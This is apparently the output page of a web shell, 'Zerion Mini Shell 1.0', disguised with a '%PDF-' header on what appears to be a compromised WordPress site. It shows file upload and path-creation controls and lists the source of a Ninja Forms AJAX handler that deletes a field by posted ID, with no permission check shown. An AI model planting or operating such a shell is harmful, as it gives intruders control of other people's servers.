%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/jalalj2hb/www/wp-content/plugins/ninja-forms/includes/AJAX/Requests/
Upload File :
Create Path :
Current File : /home/jalalj2hb/www/wp-content/plugins/ninja-forms/includes/AJAX/Requests/DeleteField.php

<?php if ( ! defined( 'ABSPATH' ) ) exit;

final class NF_AJAX_Requests_DeleteField extends WP_Async_Request
{
    protected $action = 'nf_delete_field';

    protected function handle() {

        if( ! isset( $_POST[ 'field_id' ] ) ) return;

        $field = Ninja_Forms()->form()->get_field( $_POST[ 'field_id' ] );
        $field->delete();
    }
}

Zerion Mini Shell 1.0